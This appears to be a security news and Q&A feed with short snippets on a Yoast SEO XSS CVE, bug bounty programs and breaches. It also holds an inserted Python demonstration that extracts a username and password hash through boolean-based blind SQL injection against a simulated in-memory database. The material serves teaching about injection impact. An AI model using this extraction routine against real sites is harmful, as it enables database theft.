Is there a PoC for Yoast SEO < 22.6 – Reflected Cross-Site Scripting (CVE-2024-4041)

I recently reported a Reflected Cross-Site Scripting (XSS) on a WordPress site which was running Yoast SEO 22.4, which is vulnerable to Reflected XSS. See CVE-2024-4041.
However, the company is demanding a PoC from me or it won't accept the bu…

Is it possible to exploit this supposedly boolean-based blind and time-based blind SQLi (sqlmap)?

I recently found a boolean-based blind SQLi and, since I'm new to the bug bounty scene, I don't understand what impact I can extract from it.
There is a website like example.com/tarif?tableId=136&dbsource=gkcp&nf=undefined. The vul…
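As an added illustration (not part of the original question or of any answer, and not the site named above), the following Python simulates what a boolean-based blind injection gives an attacker: the only observable is whether the page returns a row or not, yet that single bit per request is enough to read arbitrary values out of other tables. The `tableId` parameter and a `tarif` table are assumed from the question's URL; the in-memory SQLite database, the `users` table and its contents are constructed for the example.

```python
import sqlite3

# Constructed in-memory database standing in for the site's backend
# (hypothetical schema; the real application's schema is unknown).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE tarif (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO tarif VALUES (136, 'standard');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cr3t-hash');
""")

_query_count = 0  # number of simulated HTTP requests issued


def vulnerable_endpoint(table_id: str) -> bool:
    """Stand-in for example.com/tarif?tableId=...: the parameter is
    concatenated into the SQL unescaped (the assumed bug), and the caller
    only learns whether a row came back (True) or not (False)."""
    global _query_count
    _query_count += 1
    sql = f"SELECT name FROM tarif WHERE id = {table_id}"
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error:
        return False  # an error page looks like "no row" to the attacker
    return row is not None


def oracle(condition: str) -> bool:
    """Ask one yes/no question through the injection point by ANDing the
    condition onto a tableId that normally returns a row."""
    return vulnerable_endpoint(f"136 AND ({condition})")


def _binary_search(predicate_gt, lo: int, hi: int) -> int:
    """Smallest n in [lo, hi] for which 'value > n' is false, i.e. the value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if predicate_gt(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` through the boolean oracle:
    first its length, then each character by binary search on its code
    point (8 requests per character instead of up to 255 guesses)."""
    length = _binary_search(
        lambda n: oracle(f"length(({subquery})) > {n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _binary_search(
            lambda n: oracle(f"unicode(substr(({subquery}),{pos},1)) > {n}"),
            0, 255)
        chars.append(chr(code))
    return "".join(chars)


def queries_used() -> int:
    return _query_count


if __name__ == "__main__":
    print(extract_string("SELECT username FROM users WHERE id=1"))
    print(extract_string("SELECT password_hash FROM users WHERE id=1"))
    print("requests:", queries_used())
```

The impact is the same as a normal injection, only slower: anything the database user can SELECT can be pulled out, and the same `oracle` function is what sqlmap automates. A time-based blind variant differs only in the observable (a delay instead of a row), so the extraction loop above is unchanged; only `oracle` would measure response time instead of checking for a row.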

Red teaming: The key ingredient for responsible AI

Developing responsible AI isn't a straightforward proposition. On one hand, organizations are striving to stay at the forefront of technological advancement. On the other, they must ensure strict compliance with ethical standards and regulatory re…

Bug hunters can get up to $450,000 for an RCE in Google’s Android apps

Google has drastically increased the rewards bug hunters can get for reporting vulnerabilities in Android apps it develops and maintains. "We increased reward amounts by up to 10x in some categories (for example Remote Arbitrary Code Execution in…

How to optimize your bug bounty programs

In this Help Net Security interview, Roy Davis, Manager – Vulnerability Management & Bug Bounty at Zoom, discusses the role bug bounty programs play in identifying security vulnerabilities and facilitating collaboration with researchers. He …

Thinking outside the code: How the hacker mindset drives innovation

Keren Elazari is an internationally recognized security analyst, author, and researcher. Since 2000, Keren has worked with leading Israeli security firms, government organizations, innovative start-ups, and Fortune 500 companies. She is the founder of …

Mintlify Confirms Data Breach Through Compromised GitHub Tokens

By Deeba Ahmed
Mintlify Scrambles After Security Breach, Revokes Tokens and Implements New Safeguards!
This is a post from HackRead.com. Read the original post: Mintlify Confirms Data Breach Through Compromised GitHub Tokens

Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw

By Deeba Ahmed
It is unclear how much the hacker received as part of the Facebook bug bounty program.
This is a post from HackRead.com. Read the original post: Nepali Hacker Tops Hall of Fame by Exposing Facebook's Zero-Click Flaw